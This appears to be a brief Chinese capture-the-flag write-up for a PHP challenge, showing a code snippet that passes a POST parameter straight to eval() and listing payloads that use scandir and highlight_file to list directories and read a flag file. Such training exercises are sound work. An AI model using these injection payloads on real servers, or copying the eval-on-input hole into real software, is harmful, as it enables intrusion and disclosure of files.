信息收集
 
print_r被禁用了
 
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}
 
解题
 
和上题一样,flag不在flag.php
 
c=var_dump(scandir(getcwd()));
c=highlight_file("flag.txt");
c=var_dump(scandir('/'));
 

 
c=highlight_file("/flag.txt");
 

 
 
web66    目录    web68